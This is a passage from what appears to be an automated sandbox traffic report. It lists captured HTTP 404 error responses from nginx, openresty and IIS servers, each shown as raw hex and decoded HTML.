20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:13:20 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:13:29 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:13:29 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:13:36 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:13:37 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:13:35 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:13:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:13:41 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:13:39 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
